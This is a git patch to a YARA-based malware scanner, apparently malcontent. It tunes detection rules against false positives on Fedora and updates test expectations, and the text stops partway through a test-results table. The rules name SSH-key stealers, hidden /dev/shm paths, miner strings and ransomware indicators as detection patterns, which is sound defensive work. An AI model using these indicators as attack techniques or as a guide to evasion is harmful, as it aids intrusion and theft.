From 8e1f8372c1d57b7e7cca17f660ab248620700e2f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Thomas=20Str=C3=B6mberg?= Date: Thu, 7 Nov 2024 10:56:02 -0500 Subject: [PATCH] Rule tuning to decrease false-positives on Fedora (#598) * Reduce Fedora false-positives * Reduce Fedora false-positives * update tests * update testdata * split the dev_* rules --- rules/c2/addr/ip.yara | 44 +++++---- rules/c2/addr/url-unusual.yara | 1 + rules/discover/ip/public_ip.yara | 11 +++ .../chdir-unusual.yara | 0 rules/evasion/covert-location/dev-mqueue.yara | 11 +++ .../dev-shm.yara | 16 +-- .../{dev-mqueue.yara => dev_mqueue.yara} | 11 --- rules/evasion/hidden_paths/dev_shm.yara | 14 +++ rules/evasion/hidden_paths/x11.yara | 13 +++ .../etc-ld.so.preload.yara | 0 rules/exec/shell/busybox-exec.yara | 10 +- rules/exfil/stealer/ssh.yara | 10 +- rules/false_positives/flatpak.yara | 11 +++ rules/false_positives/virtualbox.yara | 11 +++ .../permission-modify-dangerous.yara | 1 + rules/fs/proc/pid-exe.yara | 11 +++ rules/hw/dev/mem.yara | 4 +- rules/impact/cryptojacking/generic.yara | 1 - rules/impact/degrade/linux_paths.yara | 13 +-- rules/impact/ransom/linux.yara | 11 ++- rules/privesc/sudoers.yara | 11 +++ .../lottie-player.min.js.mdiff | 3 +- tests/javascript/clean/connection.js.simple | 1 + tests/linux/2021.FontOnLake/45E9.elf.simple | 1 + .../2022.Symbiote/kerneldev.so.bkp.simple | 1 + tests/linux/2023.Kinsing/install.sh.simple | 5 +- .../wyoming-xray-undress-robert.simple | 10 ++ tests/linux/2024.Darkcracks/darkcracks.sh.md | 2 +- .../eight-nebraska-autumn-illinois.simple | 3 +- .../uranus-ack-mike-cat.simple | 74 ++++++++++++++ .../2024.hadooken/crondr_as_bash.sh.simple | 2 +- tests/linux/2024.hadooken/ssh_worm.sh.simple | 1 + .../linux/2024.k4spreader/degrader.sh.simple | 2 +- tests/linux/2024.k4spreader/knlib.simple | 2 +- .../emp3r0r.agent.simple | 3 +- .../2024.kworker_pretenders/gafgyt.simple | 3 +- tests/linux/2024.medusa/rkload.simple | 4 +- tests/linux/2024.miner_dropper/drop.sh.simple | 2 +- ...5d0e2031551f9f1a70b6db475ba71b2.elf.simple | 3 +- tests/linux/clean/appsec-rules.json.simple | 1 - tests/linux/clean/chrome.simple | 2 +- tests/linux/clean/clickhouse.simple | 2 +- tests/linux/clean/containerd.simple | 5 +- tests/linux/clean/default_config.json.simple | 1 - tests/linux/clean/ld-2.27.so.simple | 2 +- tests/linux/clean/nvim.simple | 2 +- tests/linux/clean/pandoc.md | 1 - tests/linux/clean/redis-server.aarch64.md | 99 +++++++++---------- tests/linux/clean/rules.json.simple | 1 - tests/linux/clean/searchindex.json.simple | 2 +- .../clean/securitySolution.chunk.9.js.simple | 1 - tests/linux/clean/slack.md | 2 +- tests/linux/clean/slirp4netns.simple | 2 +- .../clean/sonarlint-metadata.json.simple | 3 +- tests/linux/clean/sudo.simple | 1 + tests/linux/clean/trivy.simple | 4 +- .../wikiticker-2015-09-12-sampled.json.simple | 1 - tests/linux/clean/wolfictl.simple | 2 +- tests/macOS/2024.Rustdoor/localfile.simple | 2 +- .../2024.distube-fast/postinstall.js.simple | 1 + .../2024.next-react-notify/tocall.js.simple | 1 + .../2024.persona-tool/preinstall.js.simple | 1 + tests/php/clean/composer-2.7.7.simple | 1 + .../clean/setuptools/build_meta.py.simple | 1 - 64 files changed, 320 insertions(+), 158 deletions(-) rename rules/evasion/{hidden_paths => covert-location}/chdir-unusual.yara (100%) create mode 100644 rules/evasion/covert-location/dev-mqueue.yara rename rules/evasion/{hidden_paths => covert-location}/dev-shm.yara (72%) rename rules/evasion/hidden_paths/{dev-mqueue.yara => dev_mqueue.yara} (50%) create mode 100644 rules/evasion/hidden_paths/dev_shm.yara rename rules/evasion/{hidden_paths => hijack_execution}/etc-ld.so.preload.yara (100%) create mode 100644 rules/false_positives/flatpak.yara create mode 100644 rules/false_positives/virtualbox.yara create mode 100644 tests/linux/2024.Beast/wyoming-xray-undress-robert.simple create mode 100644 tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index 8561cfbef..9d24d9b9d 100644 --- a/rules/c2/addr/ip.yara +++ b/rules/c2/addr/ip.yara @@ -6,38 +6,40 @@ rule hardcoded_ip: medium { hash_2023_Downloads_311c = "311c93575efd4eeeb9c6674d0ab8de263b72a8fb060d04450daccc78ec095151" strings: - $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}/ fullword - $not_localhost = "127.0.0.1" - $not_broadcast = "255.255.255.255" - $not_upnp = "239.255.255.250" - $not_weirdo = "635.100.12.38" - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" + // strict: excludes 255.* and *.0.* *.1.* + $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" condition: - 1 of ($ip*) and none of ($not*) + filesize < 200MB and 1 of ($sus_ip*) and none of ($not*) } rule elf_hardcoded_ip: high { meta: - description = "hardcoded IP address" + description = "ELF with hardcoded IP address" hash_2023_Downloads_016a = "016a1a4fe3e9d57ab0b2a11e37ad94cc922290d2499b8d96957c3ddbdc516d74" hash_2024_Downloads_0fa8 = "503fcf8b03f89483c0335c2a7637670c8dea59e21c209ab8e12a6c74f70c7f38" hash_2023_Downloads_311c = "311c93575efd4eeeb9c6674d0ab8de263b72a8fb060d04450daccc78ec095151" strings: - $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}/ fullword - $not_localhost = "127.0.0.1" - $not_broadcast = "255.255.255.255" - $not_upnp = "239.255.255.250" - $not_weirdo = "635.100.12.38" - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" + // stricter version of what's above: excludes 255.* and *.0.* *.1.* + $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" condition: - filesize < 4MB and uint32(0) == 1179403647 and 1 of ($ip*) and none of ($not*) + filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) } diff --git a/rules/c2/addr/url-unusual.yara b/rules/c2/addr/url-unusual.yara index 32e1e61f9..07db39c8d 100644 --- a/rules/c2/addr/url-unusual.yara +++ b/rules/c2/addr/url-unusual.yara @@ -19,6 +19,7 @@ rule exotic_tld: high { $not_nips = "nips.cc" $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" + $not_whois = "bdia.btcl.com.bd" condition: filesize < 10MB and any of ($http*) and none of ($not_*) diff --git a/rules/discover/ip/public_ip.yara b/rules/discover/ip/public_ip.yara index 945dc248b..602e11b79 100644 --- a/rules/discover/ip/public_ip.yara +++ b/rules/discover/ip/public_ip.yara @@ -20,6 +20,17 @@ rule iplookup_website: high { $ipinfo = "ipinfo.io" $check_ip = "checkip.amazonaws.com" + condition: + filesize < 250MB and any of them +} + +rule v6_ipinfo_website: override { + meta: + iplookup_website = "medium" + + strings: + $v6 = "v6.ipinfo.io" + condition: any of them } diff --git a/rules/evasion/hidden_paths/chdir-unusual.yara b/rules/evasion/covert-location/chdir-unusual.yara similarity index 100% rename from rules/evasion/hidden_paths/chdir-unusual.yara rename to rules/evasion/covert-location/chdir-unusual.yara diff --git a/rules/evasion/covert-location/dev-mqueue.yara b/rules/evasion/covert-location/dev-mqueue.yara new file mode 100644 index 000000000..455bed404 --- /dev/null +++ b/rules/evasion/covert-location/dev-mqueue.yara @@ -0,0 +1,11 @@ +rule dev_mqueue: medium { + meta: + description = "path reference within /dev/mqueue (world writeable)" + + strings: + $mqueue = /\/dev\/mqueue[%\w\.\-\/]{0,64}/ + + condition: + any of them +} + diff --git a/rules/evasion/hidden_paths/dev-shm.yara b/rules/evasion/covert-location/dev-shm.yara similarity index 72% rename from rules/evasion/hidden_paths/dev-shm.yara rename to rules/evasion/covert-location/dev-shm.yara index 13484383c..57b17be10 100644 --- a/rules/evasion/hidden_paths/dev-shm.yara +++ b/rules/evasion/covert-location/dev-shm.yara @@ -33,6 +33,8 @@ rule dev_shm_file: high linux { $not_shmem = "shmem" fullword $not_shm_pages = "shm_pages" $not_wasm = "FS.mkdir(\"/dev/shm/tmp\")" + $not_auxfs = "/dev/shm/aufs" + $not_journal = "/dev/shm/journal" condition: $ref and none of ($not*) and not dev_shm_mkstemp @@ -52,17 +54,3 @@ rule dev_shm_sh: critical linux { any of them } -rule dev_shm_hidden: critical linux { - meta: - description = "path reference within /dev/shm (world writeable)" - hash_2023_OK_ad69 = "ad69e198905a8d4a4e5c31ca8a3298a0a5d761740a5392d2abb5d6d2e966822f" - hash_2023_OrBit_f161 = "f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8" - hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" - - strings: - $dev_shm = /\/dev\/shm\/\.[\%\w\.\-\/]{0,64}/ - $ignore_mkstemp = /\/dev\/shm\/[%\w\.\-\/]{0,64}X{6}/ - - condition: - $dev_shm and not $ignore_mkstemp -} diff --git a/rules/evasion/hidden_paths/dev-mqueue.yara b/rules/evasion/hidden_paths/dev_mqueue.yara similarity index 50% rename from rules/evasion/hidden_paths/dev-mqueue.yara rename to rules/evasion/hidden_paths/dev_mqueue.yara index 1a255c78f..584e9587f 100644 --- a/rules/evasion/hidden_paths/dev-mqueue.yara +++ b/rules/evasion/hidden_paths/dev_mqueue.yara @@ -1,14 +1,3 @@ -rule dev_mqueue: medium { - meta: - description = "path reference within /dev/mqueue (world writeable)" - - strings: - $mqueue = /\/dev\/mqueue[%\w\.\-\/]{0,64}/ - - condition: - any of them -} - rule dev_mqueue_hidden: high { meta: description = "path reference within /dev/mqueue (world writeable)" diff --git a/rules/evasion/hidden_paths/dev_shm.yara b/rules/evasion/hidden_paths/dev_shm.yara new file mode 100644 index 000000000..85ad99723 --- /dev/null +++ b/rules/evasion/hidden_paths/dev_shm.yara @@ -0,0 +1,14 @@ +rule dev_shm_hidden: critical linux { + meta: + description = "hidden path reference within /dev/shm (world writeable)" + hash_2023_OK_ad69 = "ad69e198905a8d4a4e5c31ca8a3298a0a5d761740a5392d2abb5d6d2e966822f" + hash_2023_OrBit_f161 = "f1612924814ac73339f777b48b0de28b716d606e142d4d3f4308ec648e3f56c8" + hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97" + + strings: + $dev_shm = /\/dev\/shm\/\.[\%\w\.\-\/]{0,64}/ + $ignore_mkstemp = /\/dev\/shm\/[%\w\.\-\/]{0,64}X{6}/ + + condition: + $dev_shm and not $ignore_mkstemp +} diff --git a/rules/evasion/hidden_paths/x11.yara b/rules/evasion/hidden_paths/x11.yara index 333446692..79f7b67b0 100644 --- a/rules/evasion/hidden_paths/x11.yara +++ b/rules/evasion/hidden_paths/x11.yara @@ -9,3 +9,16 @@ rule hidden_x11: high linux { condition: filesize < 10MB and all of them } + +rule X11: override { + meta: + hidden_x11 = "low" + + strings: + $usr_share = "/usr/share/X11" + $X11Gray = "X11Gray" + $X11_space = "/etc/X11/" + + condition: + filesize < 10MB and any of them +} diff --git a/rules/evasion/hidden_paths/etc-ld.so.preload.yara b/rules/evasion/hijack_execution/etc-ld.so.preload.yara similarity index 100% rename from rules/evasion/hidden_paths/etc-ld.so.preload.yara rename to rules/evasion/hijack_execution/etc-ld.so.preload.yara diff --git a/rules/exec/shell/busybox-exec.yara b/rules/exec/shell/busybox-exec.yara index 363a3e1a2..2c02b5432 100644 --- a/rules/exec/shell/busybox-exec.yara +++ b/rules/exec/shell/busybox-exec.yara @@ -1,8 +1,6 @@ rule busybox_runner: medium linux { meta: - hash_2023_Unix_Dropper_Mirai_0e91 = "0e91c06bb84630aba38e9c575576b46240aba40f36e6142c713c9d63a11ab4bb" - hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0" - hash_2023_Unix_Dropper_Mirai_56ca = "56ca15bdedf9751f282b24d868b426b76d3cbd7aecff5655b60449ef0d2ca5c8" + description = "runs busybox programs" strings: $ref = /\/bin\/busybox \w{2,16}[ \/\w\.]{0,64}/ @@ -13,12 +11,10 @@ rule busybox_runner: medium linux { rule busybox_runner_high: high linux { meta: - hash_2023_Unix_Dropper_Mirai_0e91 = "0e91c06bb84630aba38e9c575576b46240aba40f36e6142c713c9d63a11ab4bb" - hash_2023_Unix_Dropper_Mirai_4d50 = "4d50bee796cda760b949bb8918881b517f4af932406307014eaf77d8a9a342d0" - hash_2023_Unix_Dropper_Mirai_56ca = "56ca15bdedf9751f282b24d868b426b76d3cbd7aecff5655b60449ef0d2ca5c8" + description = "small program that runs atypical busybox programs" strings: - $ref = /\/bin\/busybox \w{2,16}[ \/\w\.]{0,64}/ + $ref = /\/bin\/busybox \w{4,16}[ \/\w\.]{0,64}/ $not_cgroup = "cgroup" fullword $not_container = "container" fullword $not_ixr = "busybox ixr" diff --git a/rules/exfil/stealer/ssh.yara b/rules/exfil/stealer/ssh.yara index 175131b92..008799cce 100644 --- a/rules/exfil/stealer/ssh.yara +++ b/rules/exfil/stealer/ssh.yara @@ -1,6 +1,6 @@ -rule tar_ssh_net: high { +rule tar_ssh_net: medium { meta: - description = "possible SSH stealer" + description = "possible tar-based SSH stealer" hash_2023_Downloads_6e35 = "6e35b5670953b6ab15e3eb062b8a594d58936dd93ca382bbb3ebdbf076a1f83b" hash_2023_Qubitstrike_branch_raw_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" hash_2023_Qubitstrike_mi = "9a5f6318a395600637bd98e83d2aea787353207ed7792ec9911b775b79443dcd" @@ -14,13 +14,15 @@ rule tar_ssh_net: high { $z_tar = "tar" fullword $z_xargs = "xargs cat" + $not_auth_keys = ".ssh/authorized_keys" + condition: - filesize < 10MB and $h and any of ($s*) and any of ($z*) + filesize < 10MB and $h and any of ($s*) and any of ($z*) and none of ($not*) } rule curl_https_ssh: high { meta: - description = "possible SSH stealer" + description = "possible curl-based SSH stealer" strings: $curl = "curl" fullword diff --git a/rules/false_positives/flatpak.yara b/rules/false_positives/flatpak.yara new file mode 100644 index 000000000..fa0303f1a --- /dev/null +++ b/rules/false_positives/flatpak.yara @@ -0,0 +1,11 @@ +rule flatpak: override { + meta: + description = "flatpak" + lvt_locker = "medium" + + strings: + $flatpak = "FLATPAK_BINARY" fullword + + condition: + filesize < 3MB and any of them +} diff --git a/rules/false_positives/virtualbox.yara b/rules/false_positives/virtualbox.yara new file mode 100644 index 000000000..e3e951aa4 --- /dev/null +++ b/rules/false_positives/virtualbox.yara @@ -0,0 +1,11 @@ +rule virtualbox_override: override { + meta: + description = "VirtualBox" + backdoor_caps = "low" + + strings: + $ref = "GROUP_DEV_VMM_BACKDOOR" + + condition: + filesize < 1MB and any of them +} diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara index 366464b63..8af721630 100644 --- a/rules/fs/permission/permission-modify-dangerous.yara +++ b/rules/fs/permission/permission-modify-dangerous.yara @@ -21,6 +21,7 @@ rule chmod_dangerous_exec: high exfil { $not_chmod_1777 = "chmod 1777" $not_chmod_01777 = "chmod 01777" $not_chromium = "CHROMIUM_TIMESTAMP" + $not_var_tmp = "chmod 0777 /var/tmp" fullword condition: filesize < 50MB and $ref and none of ($not*) diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara index e0d8ead6c..44496b6ce 100644 --- a/rules/fs/proc/pid-exe.yara +++ b/rules/fs/proc/pid-exe.yara @@ -13,3 +13,14 @@ rule proc_exe: high { condition: any of them } + +rule legit_proc_exec: override { + meta: + proc_exe = "medium" + + strings: + $string = "Fastfetch" fullword + + condition: + filesize < 3MB and any of them +} diff --git a/rules/hw/dev/mem.yara b/rules/hw/dev/mem.yara index c190c26cf..86792b325 100644 --- a/rules/hw/dev/mem.yara +++ b/rules/hw/dev/mem.yara @@ -1,4 +1,4 @@ -rule dev_mem: high linux { +rule dev_mem: medium linux { meta: capability = "CAP_SYS_RAWIO" description = "access raw system memory" @@ -13,7 +13,7 @@ rule dev_mem: high linux { $not_no = "no /dev/mem" fullword condition: - uint32(0) == 1179403647 and $val and none of ($not*) + filesize < 10MB and uint32(0) == 1179403647 and $val and none of ($not*) } rule comsvcs_minidump: high windows { diff --git a/rules/impact/cryptojacking/generic.yara b/rules/impact/cryptojacking/generic.yara index 588869409..3f3b1f28e 100644 --- a/rules/impact/cryptojacking/generic.yara +++ b/rules/impact/cryptojacking/generic.yara @@ -27,7 +27,6 @@ rule danger_crypto_miner: high { $miner_url = "miner_url" $cryptonight = "Cryptonight" $minergate = "minergate" - $_miner_ = "_miner_" condition: filesize < 10485760 and 1 of them diff --git a/rules/impact/degrade/linux_paths.yara b/rules/impact/degrade/linux_paths.yara index 753ce517e..1b7651e6b 100644 --- a/rules/impact/degrade/linux_paths.yara +++ b/rules/impact/degrade/linux_paths.yara @@ -22,7 +22,7 @@ rule linux_critical_system_paths: medium { $proc_self_cgroup = "/proc/self/cgroup" $p_lib = "/usr/lib/x86_64-linux-gnu/" $p_lib_ld = "/lib64/ld-linux-x86-64.so.2" - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ + $p_dev_sys = /\/sys\/devices\/system\/(cpu|node)\/[\w\/\.\-]{0,32}/ $p_sysctl = /sysctl[ -a-z]{0,32}/ $p_dev_watchdog = "/dev/watchdog" $p_ps = "/usr/bin/ps" @@ -31,7 +31,7 @@ rule linux_critical_system_paths: medium { $p_dev_shm = "/dev/shm" condition: - filesize < 120MB and any of ($p_etc*) and 5 of ($p*) + filesize < 120MB and any of ($p_etc*) and 40 % of ($p*) } rule linux_critical_system_paths_small_elf: high { @@ -49,7 +49,7 @@ rule linux_critical_system_paths_small_elf: high { $p_etc_selinux = /\/etc\/selinux[\w\/\.\-]{0,32}/ $p_etc_systemd = /\/etc\/systemd[\w\/\.\-]{0,32}/ $p_etc_preload = "/etc/ld.so.preload" - $p_ld_so_cache = "/etc/ld.so.cache" + $p_etc_ld_so_cache = "/etc/ld.so.cache" $p_var_run = /\/var\/run[\w\/\.\-]{0,32}/ $p_var_log = /\/var\/log[\w\/\.\-]{0,32}/ $p_usr_libexec = /\/usr\/libexec[\w\/\.\-]{0,32}/ @@ -61,7 +61,7 @@ rule linux_critical_system_paths_small_elf: high { $proc_self_cgroup = "/proc/self/cgroup" $p_lib = "/usr/lib/x86_64-linux-gnu/" $p_lib_ld = "/lib64/ld-linux-x86-64.so.2" - $p_sys = /\/sys\/(devices|class)[\w\/\.\-]{0,32}/ + $p_dev_sys = /\/sys\/devices\/system\/(cpu|node)\/[\w\/\.\-]{0,32}/ $p_sysctl = /sysctl[ -a-z]{0,32}/ $p_dev_watchdog = "/dev/watchdog" $p_ps = "/usr/bin/ps" @@ -71,9 +71,10 @@ rule linux_critical_system_paths_small_elf: high { $not_vim = "VIMRUNTIME" fullword $not_systemd = "SYSTEMD_OS_RELEASE" + $not_vio = "/sys/devices/vio" condition: - filesize < 10MB and uint32(0) == 1179403647 and any of ($p_etc*) and 5 of ($p*) and none of ($not*) + filesize < 2MB and uint32(0) == 1179403647 and any of ($p_etc*) and 40 % of ($p*) and none of ($not*) } rule linux_critical_system_paths_small_shell: high { @@ -112,5 +113,5 @@ rule linux_critical_system_paths_small_shell: high { $p_dev_shm = "/dev/shm" condition: - filesize < 64KB and $hash_bang in (0..2) and any of ($p_etc*) and 5 of ($p*) + filesize < 64KB and $hash_bang in (0..2) and any of ($p_etc*) and 40 % of ($p*) } diff --git a/rules/impact/ransom/linux.yara b/rules/impact/ransom/linux.yara index cd8e41e87..f8e9caf34 100644 --- a/rules/impact/ransom/linux.yara +++ b/rules/impact/ransom/linux.yara @@ -34,7 +34,6 @@ rule linux_syscalls: high { strings: $e_Encrypt = "ENCRYPT" - $e_crypto = "crypto" $e_encrypt = "encrypt" $e_chacha = "chacha20" $e_Processed = "Processed:" @@ -56,8 +55,16 @@ rule linux_syscalls: high { $f_rename = "rename" fullword $f_atoi = "atoi" fullword + $not_getgid = "getgid" fullword + $not_strtol = "strtol" fullword + $not_dlopen = "dlopen" fullword + $not_setenv = "setenv" fullword + $not_asctime = "asctime" fullword + $not_inet_ntop = "inet_ntop" fullword + $not_getifaddrs = "getifaddrs" fullword + condition: - filesize < 1MB and uint32(0) == 1179403647 and $f_readdir and 85 % of ($f*) and any of ($e*) + filesize < 1MB and uint32(0) == 1179403647 and $f_readdir and 85 % of ($f*) and any of ($e*) and none of ($not*) } rule conti_alike: high posix { diff --git a/rules/privesc/sudoers.yara b/rules/privesc/sudoers.yara index bbf4f5c9f..3426d3afb 100644 --- a/rules/privesc/sudoers.yara +++ b/rules/privesc/sudoers.yara @@ -22,3 +22,14 @@ rule small_elf_sudoer: high { condition: uint32(0) == 1179403647 and filesize < 10MB and sudo_editor } + +rule sudo_parser: override { + meta: + small_elf_sudoer = "medium" + + strings: + $parse = "sudo_parse" + + condition: + uint32(0) == 1179403647 and filesize < 10MB and all of them +} diff --git a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff index 87ee8b60a..0b85abe57 100644 --- a/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff +++ b/tests/javascript/2024.lottie-player/lottie-player.min.js.mdiff @@ -1,6 +1,6 @@ ## Changed: javascript/2024.lottie-player/lottie-player.min.js [🟡 MEDIUM → 🛑 CRITICAL] -### 44 new behaviors +### 43 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |-----------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| @@ -14,7 +14,6 @@ | +HIGH | **[data/builtin/appkit](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/builtin/appkit.yara#appkit)** | Includes AppKit, a web3 blockchain library | [Price impact reflects the change in market price due to your trade](https://github.com/search?q=Price+impact+reflects+the+change+in+market+price+due+to+your+trade&type=code)
[Select which chain to connect to your multi](https://github.com/search?q=Select+which+chain+to+connect+to+your+multi&type=code) | | +MEDIUM | **[anti-static/obfuscation/generic/hex_conversion](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/generic/hex_conversion.yara#hex_parse)** | converts hex data to ASCII | [toString("hex");](https://github.com/search?q=toString%28%22hex%22%29%3B&type=code) | | +MEDIUM | **[anti-static/obfuscation/js/char_codes](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/js/char_codes.yara#character_obfuscation)** | obfuscated javascript that relies on character manipulation | [charAt](https://github.com/search?q=charAt&type=code)
[charCodeAt](https://github.com/search?q=charCodeAt&type=code)
[const](https://github.com/search?q=const&type=code)
[fromCharCode](https://github.com/search?q=fromCharCode&type=code)
[function(](https://github.com/search?q=function%28&type=code)
[length](https://github.com/search?q=length&type=code)
[push](https://github.com/search?q=push&type=code)
[shift](https://github.com/search?q=shift&type=code)
[toString](https://github.com/search?q=toString&type=code)
[{return](https://github.com/search?q=%7Breturn&type=code) | -| +MEDIUM | **[c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#hardcoded_ip)** | hardcoded IP address | [114.243.154.69](https://github.com/search?q=114.243.154.69&type=code)
[13.182.181.343](https://github.com/search?q=13.182.181.343&type=code)
[13.23.32.42](https://github.com/search?q=13.23.32.42&type=code)
[14.22.33.243](https://github.com/search?q=14.22.33.243&type=code)
[14.52.54.92](https://github.com/search?q=14.52.54.92&type=code)
[146.288.257.686](https://github.com/search?q=146.288.257.686&type=code)
[15.15.34.34](https://github.com/search?q=15.15.34.34&type=code)
[15.21.28.36](https://github.com/search?q=15.21.28.36&type=code)
[15.34.34.56](https://github.com/search?q=15.34.34.56&type=code)
[153.41.153.567](https://github.com/search?q=153.41.153.567&type=code)
[156.153.41.153](https://github.com/search?q=156.153.41.153&type=code)
[172.14.22.33](https://github.com/search?q=172.14.22.33&type=code)
[178.311.311.743](https://github.com/search?q=178.311.311.743&type=code)
[181.132.465.255](https://github.com/search?q=181.132.465.255&type=code)
[198.172.14.22](https://github.com/search?q=198.172.14.22&type=code)
[21.28.36.36](https://github.com/search?q=21.28.36.36&type=code)
[21.507.477.106](https://github.com/search?q=21.507.477.106&type=code)
[22.33.243.463](https://github.com/search?q=22.33.243.463&type=code)
[23.32.42.47](https://github.com/search?q=23.32.42.47&type=code)
[24.26.45.35](https://github.com/search?q=24.26.45.35&type=code)
[243.427.41.993](https://github.com/search?q=243.427.41.993&type=code)
[25.27.52.74](https://github.com/search?q=25.27.52.74&type=code)
